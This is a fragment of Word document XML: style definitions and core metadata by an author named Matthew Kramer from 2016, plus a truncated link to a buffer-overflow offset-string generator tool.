    <w:rsid w:val="005903D7"/>
    <w:rsid w:val="008100C6"/>
    <w:rsid w:val="008F50DB"/>
    <w:rsid w:val="008F7985"/>
    <w:rsid w:val="009051F6"/>
    <w:rsid w:val="009366ED"/>
    <w:rsid w:val="009D6814"/>
    <w:rsid w:val="00A8555F"/>
    <w:rsid w:val="00CB74C4"/>
    <w:rsid w:val="00E02381"/>
    <w:rsid w:val="00F4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BA85"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{43DE1588-B8E7-4301-8271-0816825C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ACE"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E02381"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000D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C43"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000D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s.jason-rush.com/tools/buffer-overflow-eip-offset-string-genera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07CF0-4B72-4AB0-840B-D99C4209A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Kramer</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Matthew Kramer</cp:lastModifiedBy>
  <cp:revision>11</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-09-15T23:30:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-09-16T00:50:00Z</dcterms:modified>
</cp:coreProperties>
</file>